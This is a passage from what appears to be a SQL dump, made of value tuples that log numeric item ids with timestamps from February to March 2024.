(9797, NULL, NULL, 2054, 1, '2024-02-22 08:38:18'),
(9798, NULL, NULL, 2053, 1, '2024-02-22 13:17:04'),
(9799, NULL, NULL, 2064, 1, '2024-02-22 16:30:23'),
(9800, NULL, NULL, 2058, 1, '2024-02-22 21:57:35'),
(9801, NULL, NULL, 2054, 1, '2024-02-22 22:27:56'),
(9802, NULL, NULL, 2053, 1, '2024-02-23 05:21:18'),
(9803, NULL, NULL, 2054, 1, '2024-02-23 06:26:49'),
(9804, NULL, NULL, 2062, 1, '2024-02-23 08:55:48'),
(9805, NULL, NULL, 2062, 1, '2024-02-23 08:56:35'),
(9806, NULL, NULL, 2063, 1, '2024-02-23 13:10:38'),
(9807, NULL, NULL, 2061, 1, '2024-02-23 13:10:53'),
(9808, NULL, NULL, 2055, 1, '2024-02-23 13:11:01'),
(9809, NULL, NULL, 2064, 1, '2024-02-23 13:11:15'),
(9810, NULL, NULL, 2060, 1, '2024-02-23 13:11:27'),
(9811, NULL, NULL, 2059, 1, '2024-02-23 13:11:39'),
(9812, NULL, NULL, 2058, 1, '2024-02-23 13:11:53'),
(9813, NULL, NULL, 2062, 1, '2024-02-23 13:13:52'),
(9814, NULL, NULL, 2054, 1, '2024-02-23 13:14:02'),
(9815, NULL, NULL, 2053, 1, '2024-02-23 13:26:52'),
(9816, NULL, NULL, 2063, 1, '2024-02-23 13:27:03'),
(9817, NULL, NULL, 2062, 1, '2024-02-23 13:27:14'),
(9818, NULL, NULL, 2055, 1, '2024-02-23 13:27:51'),
(9819, NULL, NULL, 2060, 1, '2024-02-23 13:27:58'),
(9820, NULL, NULL, 2064, 1, '2024-02-23 13:28:05'),
(9821, NULL, NULL, 2061, 1, '2024-02-23 13:31:39'),
(9822, NULL, NULL, 2054, 1, '2024-02-23 13:32:10'),
(9823, NULL, NULL, 2059, 1, '2024-02-23 13:32:32'),
(9824, NULL, NULL, 2058, 1, '2024-02-23 13:32:41'),
(9825, NULL, NULL, 2055, 1, '2024-02-23 13:33:52'),
(9826, NULL, NULL, 2054, 1, '2024-02-23 15:22:52'),
(9827, NULL, NULL, 2062, 1, '2024-02-23 16:07:21'),
(9828, NULL, NULL, 2054, 1, '2024-02-23 18:34:58'),
(9829, NULL, NULL, 2063, 1, '2024-02-23 18:39:32'),
(9830, NULL, NULL, 2054, 1, '2024-02-23 18:44:06'),
(9831, NULL, NULL, 2064, 1, '2024-02-23 19:26:29'),
(9832, NULL, NULL, 2053, 1, '2024-02-23 19:28:13'),
(9833, NULL, NULL, 2060, 1, '2024-02-23 20:41:24'),
(9834, NULL, NULL, 2063, 1, '2024-02-23 20:52:59'),
(9835, NULL, NULL, 2058, 1, '2024-02-23 21:26:24'),
(9836, NULL, NULL, 2055, 1, '2024-02-23 21:32:16'),
(9837, NULL, NULL, 2055, 1, '2024-02-23 22:23:32'),
(9838, NULL, NULL, 2064, 1, '2024-02-23 23:01:00'),
(9839, NULL, NULL, 2061, 1, '2024-02-23 23:49:24'),
(9840, NULL, NULL, 2063, 1, '2024-02-24 00:25:25'),
(9841, NULL, NULL, 2062, 1, '2024-02-24 00:31:22'),
(9842, NULL, NULL, 2060, 1, '2024-02-24 02:09:48'),
(9843, NULL, NULL, 2063, 1, '2024-02-24 02:21:57'),
(9844, NULL, NULL, 2058, 1, '2024-02-24 02:56:52'),
(9845, NULL, NULL, 2055, 1, '2024-02-24 03:56:45'),
(9846, NULL, NULL, 2061, 1, '2024-02-24 05:27:19'),
(9847, NULL, NULL, 2061, 1, '2024-02-24 05:32:20'),
(9848, NULL, NULL, 2061, 1, '2024-02-24 05:33:07'),
(9849, NULL, NULL, 2062, 1, '2024-02-24 06:11:23'),
(9850, NULL, NULL, 2054, 1, '2024-02-24 07:21:56'),
(9851, NULL, NULL, 2053, 1, '2024-02-24 07:36:41'),
(9852, NULL, NULL, 2054, 1, '2024-02-24 07:47:12'),
(9853, NULL, NULL, 2059, 1, '2024-02-24 08:10:10'),
(9854, NULL, NULL, 2064, 1, '2024-02-24 08:29:31'),
(9855, NULL, NULL, 2061, 1, '2024-02-24 12:21:25'),
(9856, NULL, NULL, 2061, 1, '2024-02-24 12:21:47'),
(9857, NULL, NULL, 2062, 1, '2024-02-24 14:24:46'),
(9858, NULL, NULL, 2054, 1, '2024-02-24 15:39:46'),
(9859, NULL, NULL, 2061, 1, '2024-02-24 16:01:36'),
(9860, NULL, NULL, 2053, 1, '2024-02-24 17:34:59'),
(9861, NULL, NULL, 2061, 1, '2024-02-25 01:43:52'),
(9862, NULL, NULL, 2054, 1, '2024-02-25 02:00:53'),
(9863, NULL, NULL, 2064, 1, '2024-02-25 02:18:00'),
(9864, NULL, NULL, 2061, 1, '2024-02-25 04:17:46'),
(9865, NULL, NULL, 2054, 1, '2024-02-25 04:27:40'),
(9866, NULL, NULL, 2053, 1, '2024-02-25 07:03:19'),
(9867, NULL, NULL, 2063, 1, '2024-02-25 12:23:31'),
(9868, NULL, NULL, 2063, 1, '2024-02-25 12:23:46'),
(9869, NULL, NULL, 2054, 1, '2024-02-25 15:48:30'),
(9870, NULL, NULL, 2053, 1, '2024-02-25 20:24:28'),
(9871, NULL, NULL, 2059, 1, '2024-02-25 22:52:58'),
(9872, NULL, NULL, 2064, 1, '2024-02-26 02:50:10'),
(9873, NULL, NULL, 2064, 1, '2024-02-26 03:01:11'),
(9874, NULL, NULL, 2053, 1, '2024-02-26 04:16:26'),
(9875, NULL, NULL, 2054, 1, '2024-02-26 04:30:25'),
(9876, NULL, NULL, 2059, 1, '2024-02-26 09:04:40'),
(9877, NULL, NULL, 2053, 1, '2024-02-26 09:35:36'),
(9878, NULL, NULL, 2060, 1, '2024-02-26 14:28:39'),
(9879, NULL, NULL, 2054, 1, '2024-02-26 16:18:19'),
(9880, NULL, NULL, 2054, 1, '2024-02-26 22:14:21'),
(9881, NULL, NULL, 2062, 1, '2024-02-27 02:30:45'),
(9882, NULL, NULL, 2058, 1, '2024-02-27 02:45:13'),
(9883, NULL, NULL, 2054, 1, '2024-02-27 04:10:45'),
(9884, NULL, NULL, 2061, 1, '2024-02-27 17:03:32'),
(9885, NULL, NULL, 2054, 1, '2024-02-27 19:16:07'),
(9886, NULL, NULL, 2064, 1, '2024-02-27 19:28:54'),
(9887, NULL, NULL, 2064, 1, '2024-02-27 21:06:30'),
(9888, NULL, NULL, 2063, 1, '2024-02-27 21:06:30'),
(9889, NULL, NULL, 2061, 1, '2024-02-27 21:06:30'),
(9890, NULL, NULL, 2055, 1, '2024-02-27 21:06:31'),
(9891, NULL, NULL, 2060, 1, '2024-02-27 21:06:33'),
(9892, NULL, NULL, 2059, 1, '2024-02-27 21:06:33'),
(9893, NULL, NULL, 2058, 1, '2024-02-27 21:06:35'),
(9894, NULL, NULL, 2062, 1, '2024-02-27 21:06:39'),
(9895, NULL, NULL, 2054, 1, '2024-02-27 21:06:41'),
(9896, NULL, NULL, 2054, 1, '2024-02-28 03:38:22'),
(9897, NULL, NULL, 2053, 1, '2024-02-28 09:27:15'),
(9898, NULL, NULL, 2054, 1, '2024-02-28 14:19:49'),
(9899, NULL, NULL, 2058, 1, '2024-02-28 15:39:59'),
(9900, NULL, NULL, 2062, 1, '2024-02-28 17:34:40'),
(9901, NULL, NULL, 2055, 1, '2024-02-28 18:14:41'),
(9902, NULL, NULL, 2064, 1, '2024-02-28 20:56:00'),
(9903, NULL, NULL, 2061, 1, '2024-02-28 23:15:11'),
(9904, NULL, NULL, 2061, 1, '2024-02-29 01:43:13'),
(9905, NULL, NULL, 2058, 1, '2024-02-29 02:04:21'),
(9906, NULL, NULL, 2061, 1, '2024-02-29 02:26:44'),
(9907, NULL, NULL, 2061, 1, '2024-02-29 02:26:46'),
(9908, NULL, NULL, 2053, 1, '2024-02-29 02:44:44'),
(9909, NULL, NULL, 2054, 1, '2024-02-29 03:58:57'),
(9910, NULL, NULL, 2054, 1, '2024-02-29 04:55:37'),
(9911, NULL, NULL, 2064, 1, '2024-02-29 04:59:47'),
(9912, NULL, NULL, 2064, 1, '2024-02-29 10:43:32'),
(9913, NULL, NULL, 2061, 1, '2024-02-29 12:30:47'),
(9914, NULL, NULL, 2060, 1, '2024-02-29 13:13:30'),
(9915, NULL, NULL, 2053, 1, '2024-02-29 13:15:15'),
(9916, NULL, NULL, 2054, 1, '2024-02-29 16:02:26'),
(9917, NULL, NULL, 2064, 1, '2024-02-29 20:08:21'),
(9918, NULL, NULL, 2053, 1, '2024-03-01 01:34:08'),
(9919, NULL, NULL, 2054, 1, '2024-03-01 01:38:16'),
(9920, NULL, NULL, 2061, 1, '2024-03-01 01:53:03'),
(9921, NULL, NULL, 2061, 1, '2024-03-01 04:41:56'),
(9922, NULL, NULL, 2064, 1, '2024-03-01 04:55:02'),
(9923, NULL, NULL, 2055, 1, '2024-03-01 09:26:20'),
(9924, NULL, NULL, 2064, 1, '2024-03-01 09:26:24'),
(9925, NULL, NULL, 2063, 1, '2024-03-01 09:26:27'),
(9926, NULL, NULL, 2062, 1, '2024-03-01 09:26:31'),
(9927, NULL, NULL, 2060, 1, '2024-03-01 09:26:35'),
(9928, NULL, NULL, 2053, 1, '2024-03-01 13:08:51'),
(9929, NULL, NULL, 2062, 1, '2024-03-01 15:15:36'),
(9930, NULL, NULL, 2064, 1, '2024-03-01 15:22:08'),
(9931, NULL, NULL, 2060, 1, '2024-03-01 23:32:09'),
(9932, NULL, NULL, 2063, 1, '2024-03-02 00:23:04'),
(9933, NULL, NULL, 2054, 1, '2024-03-02 01:44:15'),
(9934, NULL, NULL, 2064, 1, '2024-03-02 02:30:03'),
(9935, NULL, NULL, 2062, 1, '2024-03-02 10:06:23'),
(9936, NULL, NULL, 2064, 1, '2024-03-02 13:12:21'),
(9937, NULL, NULL, 2054, 1, '2024-03-02 13:43:02'),
(9938, NULL, NULL, 2055, 1, '2024-03-02 13:43:14'),
(9939, NULL, NULL, 2058, 1, '2024-03-02 13:44:31'),
(9940, NULL, NULL, 2061, 1, '2024-03-02 13:44:47'),
(9941, NULL, NULL, 2060, 1, '2024-03-02 13:45:07'),
(9942, NULL, NULL, 2059, 1, '2024-03-02 13:45:21'),
(9943, NULL, NULL, 2063, 1, '2024-03-02 13:45:39'),
(9944, NULL, NULL, 2062, 1, '2024-03-02 13:46:25'),
(9945, NULL, NULL, 2064, 1, '2024-03-02 13:46:54'),
(9946, NULL, NULL, 2053, 1, '2024-03-02 13:55:55'),
(9947, NULL, NULL, 2053, 1, '2024-03-02 15:58:21'),
(9948, NULL, NULL, 2054, 1, '2024-03-02 21:26:37'),
(9949, NULL, NULL, 2054, 1, '2024-03-02 21:45:06'),
(9950, NULL, NULL, 2053, 1, '2024-03-02 23:20:19'),
(9951, NULL, NULL, 2064, 1, '2024-03-03 01:55:36'),
(9952, NULL, NULL, 2055, 1, '2024-03-03 02:42:42'),
(9953, NULL, NULL, 2053, 1, '2024-03-03 07:14:17'),
(9954, NULL, NULL, 2054, 1, '2024-03-03 07:51:19'),
(9955, NULL, NULL, 2060, 1, '2024-03-03 08:05:44'),
(9956, NULL, NULL, 2063, 1, '2024-03-03 08:15:11'),
(9957, NULL, NULL, 2058, 1, '2024-03-03 08:38:13'),
(9958, NULL, NULL, 2061, 1, '2024-03-03 09:05:48'),
(9959, NULL, NULL, 2055, 1, '2024-03-03 09:27:58'),
(9960, NULL, NULL, 2064, 1, '2024-03-03 10:31:41'),
(9961, NULL, NULL, 2064, 1, '2024-03-03 10:31:44'),
(9962, NULL, NULL, 2061, 1, '2024-03-03 11:00:12'),
(9963, NULL, NULL, 2062, 1, '2024-03-03 11:48:39'),
(9964, NULL, NULL, 2055, 1, '2024-03-03 11:58:58'),
(9965, NULL, NULL, 2063, 1, '2024-03-03 12:27:35'),
(9966, NULL, NULL, 2062, 1, '2024-03-03 12:27:35'),
(9967, NULL, NULL, 2061, 1, '2024-03-03 12:27:35'),
(9968, NULL, NULL, 2060, 1, '2024-03-03 12:27:37'),
(9969, NULL, NULL, 2059, 1, '2024-03-03 12:27:37'),
(9970, NULL, NULL, 2054, 1, '2024-03-03 12:27:37'),
(9971, NULL, NULL, 2055, 1, '2024-03-03 12:27:43'),
(9972, NULL, NULL, 2064, 1, '2024-03-03 12:27:48'),
(9973, NULL, NULL, 2058, 1, '2024-03-03 12:27:49'),
(9974, NULL, NULL, 2054, 1, '2024-03-03 13:18:56'),
(9975, NULL, NULL, 2059, 1, '2024-03-03 13:38:39'),
(9976, NULL, NULL, 2064, 1, '2024-03-03 13:54:34'),
(9977, NULL, NULL, 2053, 1, '2024-03-03 15:00:18'),
(9978, NULL, NULL, 2054, 1, '2024-03-03 15:28:16'),
(9979, NULL, NULL, 2064, 1, '2024-03-03 19:13:40'),
(9980, NULL, NULL, 2054, 1, '2024-03-04 01:07:20'),
(9981, NULL, NULL, 2062, 1, '2024-03-04 01:47:48'),
(9982, NULL, NULL, 2053, 1, '2024-03-04 01:53:43'),
(9983, NULL, NULL, 2064, 1, '2024-03-04 03:01:33'),
(9984, NULL, NULL, 2053, 1, '2024-03-04 13:29:10'),
(9985, NULL, NULL, 2064, 1, '2024-03-04 13:39:44'),
(9986, NULL, NULL, 2064, 1, '2024-03-04 15:20:44'),
(9987, NULL, NULL, 2054, 1, '2024-03-04 17:41:16'),
(9988, NULL, NULL, 2064, 1, '2024-03-04 20:34:15'),
(9989, NULL, NULL, 2063, 1, '2024-03-05 01:00:10'),
(9990, NULL, NULL, 2063, 1, '2024-03-05 01:47:32'),
(9991, NULL, NULL, 2063, 1, '2024-03-05 01:47:41'),
(9992, NULL, NULL, 2059, 1, '2024-03-05 02:01:53'),
(9993, NULL, NULL, 2063, 1, '2024-03-05 09:06:10'),
(9994, NULL, NULL, 2053, 1, '2024-03-05 09:37:18'),
(9995, NULL, NULL, 2054, 1, '2024-03-05 12:06:03'),
(9996, NULL, NULL, 2061, 1, '2024-03-05 13:38:16'),
(9997, NULL, NULL, 2063, 1, '2024-03-05 15:14:46'),
(9998, NULL, NULL, 2053, 1, '2024-03-05 17:29:40'),
(9999, NULL, NULL, 2064, 1, '2024-03-05 21:01:18'),
(10000, NULL, NULL, 2062, 1, '2024-03-05 21:01:59'),
(10001, NULL, NULL, 2053, 1, '2024-03-05 21:02:17'),
(10002, NULL, NULL, 2063, 1, '2024-03-05 21:03:50'),
(10003, NULL, NULL, 2061, 1, '2024-03-05 21:03:53'),
(10004, NULL, NULL, 2059, 1, '2024-03-05 21:04:01'),
(10005, NULL, NULL, 2058, 1, '2024-03-05 21:04:05'),
(10006, NULL, NULL, 2055, 1, '2024-03-05 21:05:21'),
(10007, NULL, NULL, 2054, 1, '2024-03-05 21:05:29'),
(10008, NULL, NULL, 2060, 1, '2024-03-05 21:09:01'),
(10009, NULL, NULL, 2053, 1, '2024-03-05 21:16:02'),
(10010, NULL, NULL, 2058, 1, '2024-03-05 22:17:10'),
(10011, NULL, NULL, 2054, 1, '2024-03-05 23:23:33'),
(10012, NULL, NULL, 2054, 1, '2024-03-05 23:33:18'),
(10013, NULL, NULL, 2063, 1, '2024-03-05 23:37:05'),
(10014, NULL, NULL, 2059, 1, '2024-03-05 23:37:09'),
(10015, NULL, NULL, 2058, 1, '2024-03-06 01:18:51'),
(10016, NULL, NULL, 2058, 1, '2024-03-06 01:29:00'),
(10017, NULL, NULL, 2060, 1, '2024-03-06 03:45:12'),
(10018, NULL, NULL, 2054, 1, '2024-03-06 07:37:57'),
(10019, NULL, NULL, 2059, 1, '2024-03-06 16:35:59'),
(10020, NULL, NULL, 2053, 1, '2024-03-06 16:37:28'),
(10021, NULL, NULL, 2054, 1, '2024-03-06 23:31:10'),
(10022, NULL, NULL, 2059, 1, '2024-03-07 02:11:10'),
(10023, NULL, NULL, 2058, 1, '2024-03-07 06:46:34'),
(10024, NULL, NULL, 2054, 1, '2024-03-07 09:14:10'),
(10025, NULL, NULL, 2063, 1, '2024-03-07 13:18:13'),
(10026, NULL, NULL, 2064, 1, '2024-03-07 13:47:44'),
(10027, NULL, NULL, 2061, 1, '2024-03-07 14:09:17'),
(10028, NULL, NULL, 2054, 1, '2024-03-07 17:05:58'),
(10029, NULL, NULL, 2063, 1, '2024-03-07 19:06:02'),
(10030, NULL, NULL, 2063, 1, '2024-03-08 02:12:00'),
(10031, NULL, NULL, 2055, 1, '2024-03-08 02:28:32'),
(10032, NULL, NULL, 2064, 1, '2024-03-08 02:37:30'),
(10033, NULL, NULL, 2061, 1, '2024-03-08 03:52:02'),
(10034, NULL, NULL, 2064, 1, '2024-03-08 03:52:29'),
(10035, NULL, NULL, 2054, 1, '2024-03-08 05:05:58'),
(10036, NULL, NULL, 2061, 1, '2024-03-08 09:36:25'),
(10037, NULL, NULL, 2054, 1, '2024-03-08 13:00:38'),
(10038, NULL, NULL, 2064, 1, '2024-03-08 14:07:11'),
(10039, NULL, NULL, 2054, 1, '2024-03-08 14:45:02'),
(10040, NULL, NULL, 2064, 1, '2024-03-08 18:56:29'),
(10041, NULL, NULL, 2055, 1, '2024-03-08 20:32:09'),
(10042, NULL, NULL, 2053, 1, '2024-03-08 20:54:57'),
(10043, NULL, NULL, 2054, 1, '2024-03-08 21:21:55'),
(10044, NULL, NULL, 2062, 1, '2024-03-08 22:24:05'),
(10045, NULL, NULL, 2062, 1, '2024-03-08 22:25:23'),
(10046, NULL, NULL, 2060, 1, '2024-03-09 02:43:51'),
(10047, NULL, NULL, 2061, 1, '2024-03-09 04:14:32'),
(10048, NULL, NULL, 2054, 1, '2024-03-09 04:31:57'),
(10049, NULL, NULL, 2063, 1, '2024-03-09 08:03:44'),
(10050, NULL, NULL, 2064, 1, '2024-03-09 12:40:38'),
(10051, NULL, NULL, 2055, 1, '2024-03-09 12:59:08'),
(10052, NULL, NULL, 2053, 1, '2024-03-09 13:06:43'),
(10053, NULL, NULL, 2054, 1, '2024-03-09 16:15:03'),
(10054, NULL, NULL, 2060, 1, '2024-03-09 20:14:05'),
(10055, NULL, NULL, 2055, 1, '2024-03-09 20:14:09'),
(10056, NULL, NULL, 2059, 1, '2024-03-09 20:14:27'),
(10057, NULL, NULL, 2058, 1, '2024-03-09 20:14:31'),
(10058, NULL, NULL, 2054, 1, '2024-03-09 20:14:40'),
(10059, NULL, NULL, 2064, 1, '2024-03-09 20:14:49'),
(10060, NULL, NULL, 2063, 1, '2024-03-09 20:14:56'),
(10061, NULL, NULL, 2062, 1, '2024-03-09 20:15:00'),
(10062, NULL, NULL, 2061, 1, '2024-03-09 20:15:05'),
(10063, NULL, NULL, 2054, 1, '2024-03-10 00:55:58'),
(10064, NULL, NULL, 2062, 1, '2024-03-10 02:25:53'),
(10065, NULL, NULL, 2064, 1, '2024-03-10 05:18:45'),
(10066, NULL, NULL, 2058, 1, '2024-03-10 05:24:18'),
(10067, NULL, NULL, 2053, 1, '2024-03-10 06:08:39'),
(10068, NULL, NULL, 2059, 1, '2024-03-10 06:26:02'),
(10069, NULL, NULL, 2053, 1, '2024-03-10 13:05:52'),
(10070, NULL, NULL, 2054, 1, '2024-03-10 14:12:27'),
(10071, NULL, NULL, 2064, 1, '2024-03-10 14:15:11'),
(10072, NULL, NULL, 2062, 1, '2024-03-10 14:58:44'),
(10073, NULL, NULL, 2060, 1, '2024-03-10 15:05:09'),
(10074, NULL, NULL, 2064, 1, '2024-03-10 17:05:32'),
(10075, NULL, NULL, 2061, 1, '2024-03-11 01:08:56'),
(10076, NULL, NULL, 2061, 1, '2024-03-11 01:10:24'),
(10077, NULL, NULL, 2061, 1, '2024-03-11 01:14:00'),
(10078, NULL, NULL, 2061, 1, '2024-03-11 01:56:56'),
(10079, NULL, NULL, 2064, 1, '2024-03-11 05:38:23'),
(10080, NULL, NULL, 2053, 1, '2024-03-11 07:01:12'),
(10081, NULL, NULL, 2054, 1, '2024-03-11 09:19:29'),
(10082, NULL, NULL, 2061, 1, '2024-03-11 15:19:43'),
(10083, NULL, NULL, 2053, 1, '2024-03-11 16:09:01'),
(10084, NULL, NULL, 2064, 1, '2024-03-11 17:26:30'),
(10085, NULL, NULL, 2062, 1, '2024-03-11 18:25:31'),
(10086, NULL, NULL, 2064, 1, '2024-03-12 02:21:38'),
(10087, NULL, NULL, 2063, 1, '2024-03-12 02:43:04'),
(10088, NULL, NULL, 2058, 1, '2024-03-12 03:10:51'),
(10089, NULL, NULL, 2061, 1, '2024-03-12 05:13:42'),
(10090, NULL, NULL, 2061, 1, '2024-03-12 07:10:49'),
(10091, NULL, NULL, 2053, 1, '2024-03-12 07:41:26'),
(10092, NULL, NULL, 2054, 1, '2024-03-12 11:28:59'),
(10093, NULL, NULL, 2064, 1, '2024-03-12 12:55:57'),
(10094, NULL, NULL, 2064, 1, '2024-03-12 15:52:06'),
(10095, NULL, NULL, 2063, 1, '2024-03-12 19:02:36'),
(10096, NULL, NULL, 2060, 1, '2024-03-12 20:54:35'),
(10097, NULL, NULL, 2063, 1, '2024-03-12 21:02:03'),
(10098, NULL, NULL, 2058, 1, '2024-03-12 21:36:49'),
(10099, NULL, NULL, 2055, 1, '2024-03-12 21:58:33'),
(10100, NULL, NULL, 2060, 1, '2024-03-12 23:15:43'),
(10101, NULL, NULL, 2063, 1, '2024-03-12 23:24:45'),
(10102, NULL, NULL, 2058, 1, '2024-03-12 23:44:40'),
(10103, NULL, NULL, 2063, 1, '2024-03-13 00:05:25'),
(10104, NULL, NULL, 2058, 1, '2024-03-13 00:37:51'),
(10105, NULL, NULL, 2060, 1, '2024-03-13 00:43:34'),
(10106, NULL, NULL, 2063, 1, '2024-03-13 00:50:51'),
(10107, NULL, NULL, 2058, 1, '2024-03-13 01:08:40'),
(10108, NULL, NULL, 2055, 1, '2024-03-13 01:44:51'),
(10109, NULL, NULL, 2063, 1, '2024-03-13 02:14:00'),
(10110, NULL, NULL, 2061, 1, '2024-03-13 02:51:08'),
(10111, NULL, NULL, 2062, 1, '2024-03-13 03:28:07'),
(10112, NULL, NULL, 2054, 1, '2024-03-13 04:38:44'),
(10113, NULL, NULL, 2059, 1, '2024-03-13 04:53:39'),
(10114, NULL, NULL, 2064, 1, '2024-03-13 05:05:32'),
(10115, NULL, NULL, 2061, 1, '2024-03-13 05:28:17'),
(10116, NULL, NULL, 2063, 1, '2024-03-13 05:28:52'),
(10117, NULL, NULL, 2060, 1, '2024-03-13 10:28:07'),
(10118, NULL, NULL, 2063, 1, '2024-03-13 10:36:02'),
(10119, NULL, NULL, 2059, 1, '2024-03-13 10:43:35'),
(10120, NULL, NULL, 2058, 1, '2024-03-13 10:54:54'),
(10121, NULL, NULL, 2055, 1, '2024-03-13 11:33:16'),
(10122, NULL, NULL, 2061, 1, '2024-03-13 12:42:49'),
(10123, NULL, NULL, 2062, 1, '2024-03-13 13:20:59'),
(10124, NULL, NULL, 2054, 1, '2024-03-13 14:30:44'),
(10125, NULL, NULL, 2059, 1, '2024-03-13 14:44:26'),
(10126, NULL, NULL, 2064, 1, '2024-03-13 14:55:05'),
(10127, NULL, NULL, 2054, 1, '2024-03-13 19:57:41'),
(10128, NULL, NULL, 2058, 1, '2024-03-13 22:37:22'),
(10129, NULL, NULL, 2064, 1, '2024-03-14 06:32:13'),
(10130, NULL, NULL, 2053, 1, '2024-03-14 08:22:17'),
(10131, NULL, NULL, 2061, 1, '2024-03-14 09:38:47'),
(10132, NULL, NULL, 2054, 1, '2024-03-14 10:42:02'),
(10133, NULL, NULL, 2059, 1, '2024-03-14 10:42:48'),
(10134, NULL, NULL, 2058, 1, '2024-03-14 12:47:30'),
(10135, NULL, NULL, 2054, 1, '2024-03-14 20:46:25'),
(10136, NULL, NULL, 2064, 1, '2024-03-15 01:59:19'),
(10137, NULL, NULL, 2061, 1, '2024-03-15 02:54:48'),
(10138, NULL, NULL, 2054, 1, '2024-03-15 07:45:27'),
(10139, NULL, NULL, 2063, 1, '2024-03-15 08:25:46'),
(10140, NULL, NULL, 2054, 1, '2024-03-15 10:59:45'),
(10141, NULL, NULL, 2053, 1, '2024-03-15 13:31:16'),
(10142, NULL, NULL, 2061, 1, '2024-03-15 16:00:04'),
(10143, NULL, NULL, 2054, 1, '2024-03-15 16:01:31'),
(10144, NULL, NULL, 2061, 1, '2024-03-15 17:16:53'),
(10145, NULL, NULL, 2064, 1, '2024-03-15 17:55:19'),
(10146, NULL, NULL, 2055, 1, '2024-03-15 18:07:53'),
(10147, NULL, NULL, 2059, 1, '2024-03-16 07:21:59'),
(10148, NULL, NULL, 2059, 1, '2024-03-16 07:22:01'),
(10149, NULL, NULL, 2059, 1, '2024-03-16 07:22:02'),
(10150, NULL, NULL, 2064, 1, '2024-03-16 08:46:51'),
(10151, NULL, NULL, 2053, 1, '2024-03-16 09:48:03'),
(10152, NULL, NULL, 2053, 1, '2024-03-16 09:48:27'),
(10153, NULL, NULL, 2061, 1, '2024-03-16 12:16:37'),
(10154, NULL, NULL, 2063, 1, '2024-03-16 12:25:58'),
(10155, NULL, NULL, 2054, 1, '2024-03-16 13:46:42'),
(10156, NULL, NULL, 2059, 1, '2024-03-16 14:46:42'),
(10157, NULL, NULL, 2064, 1, '2024-03-16 16:17:40'),
(10158, NULL, NULL, 2064, 1, '2024-03-16 18:17:02'),
(10159, NULL, NULL, 2054, 1, '2024-03-16 21:46:54'),
(10160, NULL, NULL, 2062, 1, '2024-03-16 23:44:29'),
(10161, NULL, NULL, 2054, 1, '2024-03-17 05:47:03'),
(10162, NULL, NULL, 2059, 1, '2024-03-17 06:08:01'),
(10163, NULL, NULL, 2064, 1, '2024-03-17 06:10:12'),
(10164, NULL, NULL, 2061, 1, '2024-03-17 11:25:43'),
(10165, NULL, NULL, 2064, 1, '2024-03-17 11:44:23'),
(10166, NULL, NULL, 2054, 1, '2024-03-17 11:44:24'),
(10167, NULL, NULL, 2060, 1, '2024-03-17 11:44:25'),
(10168, NULL, NULL, 2055, 1, '2024-03-17 11:44:25'),
(10169, NULL, NULL, 2058, 1, '2024-03-17 11:44:26'),
(10170, NULL, NULL, 2062, 1, '2024-03-17 11:44:27'),
(10171, NULL, NULL, 2059, 1, '2024-03-17 11:44:28'),
(10172, NULL, NULL, 2063, 1, '2024-03-17 11:44:28'),
(10173, NULL, NULL, 2061, 1, '2024-03-17 11:44:28'),
(10174, NULL, NULL, 2053, 1, '2024-03-17 12:14:15'),
(10175, NULL, NULL, 2063, 1, '2024-03-17 12:25:59'),
(10176, NULL, NULL, 2063, 1, '2024-03-17 15:50:18'),
(10177, NULL, NULL, 2058, 1, '2024-03-17 15:51:23'),
(10178, NULL, NULL, 2054, 1, '2024-03-17 19:46:52'),
(10179, NULL, NULL, 2063, 1, '2024-03-17 19:52:03'),
(10180, NULL, NULL, 2063, 1, '2024-03-17 19:52:33'),
(10181, NULL, NULL, 2064, 1, '2024-03-17 21:24:44'),
(10182, NULL, NULL, 2064, 1, '2024-03-17 22:17:30'),
(10183, NULL, NULL, 2054, 1, '2024-03-18 00:18:28'),
(10184, NULL, NULL, 2058, 1, '2024-03-18 04:16:51'),
(10185, NULL, NULL, 2062, 1, '2024-03-18 04:17:04'),
(10186, NULL, NULL, 2062, 1, '2024-03-18 05:01:50'),
(10187, NULL, NULL, 2054, 1, '2024-03-18 05:07:05'),
(10188, NULL, NULL, 2064, 1, '2024-03-18 08:08:38'),
(10189, NULL, NULL, 2059, 1, '2024-03-18 09:34:03'),
(10190, NULL, NULL, 2058, 1, '2024-03-18 10:43:27'),
(10191, NULL, NULL, 2058, 1, '2024-03-18 19:02:05'),
(10192, NULL, NULL, 2059, 1, '2024-03-18 21:00:10'),
(10193, NULL, NULL, 2061, 1, '2024-03-19 04:56:38'),
(10194, NULL, NULL, 2064, 1, '2024-03-19 06:21:22'),
(10195, NULL, NULL, 2063, 1, '2024-03-19 06:21:26'),
(10196, NULL, NULL, 2054, 1, '2024-03-19 06:21:27'),
(10197, NULL, NULL, 2059, 1, '2024-03-19 06:21:29'),
(10198, NULL, NULL, 2055, 1, '2024-03-19 06:21:37'),
(10199, NULL, NULL, 2060, 1, '2024-03-19 06:21:38'),
(10200, NULL, NULL, 2061, 1, '2024-03-19 06:21:39'),
(10201, NULL, NULL, 2062, 1, '2024-03-19 06:21:40'),
(10202, NULL, NULL, 2058, 1, '2024-03-19 06:21:41'),
(10203, NULL, NULL, 2064, 1, '2024-03-19 08:08:38'),
(10204, NULL, NULL, 2061, 1, '2024-03-19 16:23:38'),
(10205, NULL, NULL, 2059, 1, '2024-03-19 22:14:01'),
(10206, NULL, NULL, 2061, 1, '2024-03-19 23:46:50'),
(10207, NULL, NULL, 2061, 1, '2024-03-19 23:46:53'),
(10208, NULL, NULL, 2054, 1, '2024-03-20 02:05:39'),
(10209, NULL, NULL, 2060, 1, '2024-03-20 03:19:12'),
(10210, NULL, NULL, 2062, 1, '2024-03-20 05:03:27'),
(10211, NULL, NULL, 2059, 1, '2024-03-20 06:41:33'),
(10212, NULL, NULL, 2064, 1, '2024-03-20 07:21:20'),
(10213, NULL, NULL, 2062, 1, '2024-03-20 11:55:24'),
(10214, NULL, NULL, 2054, 1, '2024-03-20 14:18:51'),
(10215, NULL, NULL, 2063, 1, '2024-03-20 16:01:44'),
(10216, NULL, NULL, 2059, 1, '2024-03-20 18:41:35'),
(10217, NULL, NULL, 2060, 1, '2024-03-20 20:28:15'),
(10218, NULL, NULL, 2060, 1, '2024-03-20 20:47:38'),
(10219, NULL, NULL, 2064, 1, '2024-03-20 20:47:50'),
(10220, NULL, NULL, 2061, 1, '2024-03-20 23:46:54'),
(10221, NULL, NULL, 2064, 1, '2024-03-21 00:17:48'),
(10222, NULL, NULL, 2054, 1, '2024-03-21 01:34:46'),
(10223, NULL, NULL, 2059, 1, '2024-03-21 06:12:51'),
(10224, NULL, NULL, 2063, 1, '2024-03-21 07:28:10'),
